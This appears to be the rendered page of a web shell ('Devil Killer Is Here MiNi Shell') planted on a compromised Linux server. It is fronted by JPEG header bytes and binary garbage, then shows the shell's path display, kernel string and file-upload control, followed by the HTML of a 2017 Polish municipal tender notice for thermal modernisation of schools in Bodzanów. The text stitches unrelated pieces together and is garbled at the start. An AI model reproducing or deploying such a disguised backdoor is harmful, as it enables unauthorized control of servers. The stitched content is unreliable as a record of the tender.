JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170331/56243-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bodzanow.bipgmina.pl' target='_blank'>http://www.bodzanow.bipgmina.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 56243 - 2017
              z dnia 2017-03-31 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bodzanów: Termomodernizacja budynków użyteczności publicznej zlokalizowanych na terenie Gmin Związku Gmin Regionu Płockiego <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Program Oeracyjny Województwa Mazowieckiego na lata 2014-2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina  Bodzanów, krajowy numer identyfikacyjny
              61101522800000, ul.
              ul. Bankowa 
              7,
              09470  
              Bodzanów, woj.
              mazowieckie, państwo
              Polska, tel.
              24 2607006 w. 30, e-mail
              gmina@bodzanow.pl, faks
              242 607 065.
              <br />
              Adres strony internetowej (URL): www.bodzanow.bipgmina.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />Urząd Gminy w Bodzanowi, ul. Bankowa 7, 09-470 Bodzanów</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bodzanow.bipgmina.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Urząd Gminy w Bodzanowie, ul. Bankowa 7, 09-470 Bodzanów, Sekretariat p. nr 3<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Termomodernizacja budynków użyteczności publicznej zlokalizowanych na terenie Gmin Związku Gmin Regionu Płockiego <br /><b>Numer referencyjny: </b>RI.271.60.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie I - Budynek Gimnazjum
Zakres robót obejmuje m.in.: 
1. Ściany fundamentowe
odkopanie ścian piwnicznych i ławy fundamentowej, oczyszczenie podłoża, wykonanie napraw, usunięcie i uzupełnienie starych odsłoniętych tynków, wykonanie dwuwarstwowej  hydroizolacji bitumiczno-polimerowej ścian piwnic do poziomu terenu,
ocieplenie ścian fundamentowych i cokołu styropianem 
o podwyższonej odporności na  wilgoć i korozję biologiczną gr 8cm, zabezpieczenie podziemnej części ściany fundamentowej folią kubełkową, wykonanie tynku mozaikowego drobnoziarnistego z mikką na cokole ponad poziomem terenu oraz zabezpieczenie powłoką anty grafitti.
2. Ściany zewnętrzne powyżej cokołu
ocieplenie ścian nadziemia styropian grafitowy gr. 8cm, wykonanie napraw 
i usunięcie i uzupełnienie starych odspojonych tynków, wzmocnienie izolacji termicznej powyżej cokołu do wysokości 2,0 m zaprawą klejowo-szpachlową z zatopioną  siatką z włókna szklanego oraz siatką wraz z zabezpieczeniem powłoką anty grafitti, na wysokości powyżej 2,0 m standardowa zaprawa klejowo-szpachlowa z zatopioną  siatką z włókna szklanego, wykonanie cienkowarstwowego tynku strukturalnego silikonowego 
3. Docieplenie stropu nad ostatnią kondygnacją 
docieplenie poddasza nieużytkowego wełną mineralną gr. 19 cm na folii paroizolacyjnej ułożonej na stropie oraz wykonanie ślepej podłogi z desek gr. 25mm na legarach 
4. Docieplenie dachu nad wiatrołapem
demontaż i ponowny montaż podbitki z listew drewnianych  17,0m2, docieplenie sufitu wełną mineralną gr. 17 cm 
5. Prace ogólnobudowlane  remontowe budynku
wymiana obróbek blacharskich, rynien i rur spustowych, parapetów zewnętrznych (blacha cynkowo-tytanowa gr. 0,7mm), wymiana stolarki okiennej PVC  szt. 7, współczynnik przenikania ciepła, remont pochylni zewnętrznej, rozbiórka i ułożenie chodnika z kostki, wymiana opaski obwodowej budynku z płyt betonowych na kostkę, montaż nawiewników higrosterowalnych.
6. Roboty elektryczne
montaż instalacji fotowoltaicznej na potrzeby oświetlenia zewnętrznego wraz z wymianą opraw, wymiana opraw oświetlenia wewnętrznego, wykonanie instalacji odgromowej nowe odprowadzenia pionowe, montaż systemu monitoringu mediów obiektu z możliwością powiadamiania
7. Roboty instalacyjne
wykonanie układu pomiarowego dla potrzeb c.o.,  zabezpieczenie antykorozyjne rurociągów, podpór i uchwytów, wykonanie izolacji termicznej rurociągów, regulacja hydrauliczna instalacji c. o. (montaż nowych głowic do zaworów termostatycznych), wymiana uszkodzonych grzejników 


Zadanie II - Budynek Szkoły Podstawowej wraz z salą gimnastyczną
Zakres robót obejmuje m.in.: 
1. Ściany fundamentowe
odkopanie ścian piwnicznych i ławy fundamentowej, oczyszczenie podłoża, wykonanie napraw, usunięcie i uzupełnienie starych odsłoniętych tynków, wykonanie dwuwarstwowej  hydroizolacji bitumiczno-polimerowej ścian piwnic do poziomu terenu, ocieplenie ścian fundamentowych i cokołu styropianem gr 13cm, o podwyższonej odporności na  wilgoć i korozję biologiczną, zabezpieczenie podziemnej części ściany fundamentowej folią kubełkową, wykonanie tynku mozaikowego drobnoziarnistego z mikką na cokole ponad poziomem terenu oraz zabezpieczenie powłoką anty grafitti.
2. Ściany zewnętrzne powyżej cokołu
wymiana stolarki okiennej PVC  szt. 3 i aluminiowych  szt. 3, współczynnik przenikania ciepła, ocieplenie ścian nadziemia styropian grafitowy gr. 14cm o pow., wykonanie napraw, usunięcie i uzupełnienie starych odspojonych tynków, wzmocnienie izolacji termicznej powyżej cokołu do wysokości 2,0 m zaprawą klejowo-szpachlową z zatopioną  siatką z włókna szklanego oraz siatką wraz z zabezpieczeniem powłoką anty grafitti, na wysokości powyżej 2,0 m standardowa zaprawa klejowo-szpachlowa z zatopioną siatką z włókna szklanego, wykonanie cienkowarstwowego tynku strukturalnego silikonowego 
3. Docieplenie stropu nad ostatnią kondygnacją 
a) nad częścią główną budynku i nad salą gimnastyczną
docieplenie poddasza nieużytkowego wełną mineralną gr. 19 cm na folii paroizolacyjnej ułożonej na stropie, wykonanie ślepej podłogi  (nad częścią główną budynku) z desek gr. 25mm na legarach 
b) nad łącznikiem
docieplenie poddasza nieużytkowego wełną mineralną gr. 17 cm na folii paroizolacyjnej ułożonej na stropie 
4. Wymiana pokrycia dachu
wymiana pokrycia z papy bitumicznej  na bachodachówkę oraz  wymiana blachy trapezowej nad łącznikiem na blachodachówkę  łączna powierzchnia dachów 
5. Prace ogólnobudowlane  remontowe budynku
wymiana obróbek blacharskich, rynien i rur spustowych, parapetów zewnętrznych (blacha cynkowo-tytanowa gr. 0,7mm), wymiana stolarki okiennej PVC  szt 3 i aluminiowych  
szt 3, współczynnik przenikania ciepła, remont schodów i pochylni zewnętrznej z montażem balustrad, rozbiórka i ułożenie chodnika z kostki, wymiana opaski obwodowej budynku z płyt betonowych na kostkę,
6. Roboty elektryczne
montaż instalacji fotowoltaicznej na potrzeby oświetlenia zewnętrznego, wykonaniem instalacji oświetlenia zewnętrznego z wymianą opraw, częściowa wymiana opraw oświetlenia wewnętrznego, wykonanie nowej instalacji odgromowej, montaż systemu monitoringu mediów obiektu z możliwością powiadamiania
7. Roboty instalacyjne
wykonanie układu pomiarowego dla potrzeb c.o., zabezpieczenie antykorozyjne rurociągów, podpór i uchwytów, wykonanie izolacji termicznej rurociągów, regulacja hydrauliczna instalacji c.o. (montaż nowych głowic do zaworów termostatycznych), wymiana uszkodzonych grzejników. 
<br /><br /><b>II.5) Główny kod CPV: </b>45321000-3<br /><b> Dodatkowe kody CPV:</b>45260000-7,
                45311000-3,
                45330000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              1409774.54<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/10/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 30/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż:
Zadanie I -  400 000 zł.;
Zadanie II  800 000 zł.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający wymaga:
a) dla zadania I: 
- wykonania co najmniej 1 zamówienia obejmującego roboty budowlane polegające na ociepleniu obiektu/ów o łącznej powierzchni ocieplanej metodą lekką mokrą nie mniejszej niż 500m2 - wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie;  
- dysponowania:
* osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno  budowlanej bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane (tj.: Dz. U. z 2016 r. poz. 2255) do pełnienia samodzielnych funkcji technicznych w budownictwie  kierownik budowy, posiadający minimum 2-letnie doświadczenie w pełnieniu funkcji kierownika budowy;
* osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane (tj.: Dz. U. z 2016 r. poz. 2255) do pełnienia samodzielnych funkcji technicznych w budownictwie - kierownik robót, posiadający minimum roczne doświadczenie w pełnieniu funkcji kierownika robót;
* osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane (tj.: Dz. U. z 2016 r. poz. 2255) do pełnienia samodzielnych funkcji technicznych w budownictwie - kierownik robót, posiadający minimum roczne  doświadczenie w pełnieniu funkcji kierownika robót.
Zamawiający uzna za spełnienie przez Wykonawcę ww. warunku również w przypadku dysponowania osobą/osobami posiadającą/posiadającymi ww. uprawnienia.
b) dla zadania II:
- wykonania co najmniej 1 zamówienia obejmującego roboty budowlane polegające na ociepleniu obiektu/ów o łącznej powierzchni ocieplanej metodą lekką mokrą nie mniejszej niż 1000m2 i na wykonaniu pokrycia dachowego z blachodachówki o powierzchni nie mniejszej niż 500m2
lub 
wykonanie co najmniej 2 zamówień z których jedno zamówienie obejmuje roboty budowlane polegające na ociepleniu obiektu/ów o łącznej powierzchni ocieplanej metodą lekką mokrą nie mniejszej niż 1000m 2, drugie zamówienie obejmuje wykonanie pokrycia dachowego z blachodachówki o powierzchni nie mniejszej niż 500m2 - wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie;  
- dysponowania:
*  osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno  budowlanej bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane (tj.: Dz. U. z 2016 r. poz. 2255) do pełnienia samodzielnych funkcji technicznych w budownictwie  kierownik budowy, posiadający minimum 2-letnie doświadczenie w pełnieniu funkcji kierownika budowy;
* osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane (tj.: Dz. U. z 2016 r. poz. 2255) do pełnienia samodzielnych funkcji technicznych w budownictwie - kierownik robót, posiadający minimum roczne doświadczenie w pełnieniu funkcji kierownika robót;
* osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane (tj.: Dz. U. z 2016 r. poz. 2255) do pełnienia samodzielnych funkcji technicznych w budownictwie - kierownik robót, posiadający minimum roczne  doświadczenie w pełnieniu funkcji kierownika robót.
Zamawiający uzna za spełnienie przez Wykonawcę ww. warunku również w przypadku dysponowania osobą/osobami posiadającą/posiadającymi ww. uprawnienia


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                UWAGA:
Zamawiający dopuszcza uprawnienia budowlane odpowiadające w/w uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących przepisów.  
Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy  Prawo budowlane, mogą również wykonać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. m.in. w ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65) oraz w rozumieniu art. 20a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2014 r., poz. 1946)
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Zamawiający zaleca złożenie oświadczenia zgodnie ze wzorem wskazanym w załączniku nr 3 do siwz. 
2.Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z uiszczeniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3.Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosek o dopuszczenie do udziału w postępowaniu lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
4.Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia w oparciu o art. 24 ust. 5 pkt. 1 ustawy. W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną;
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
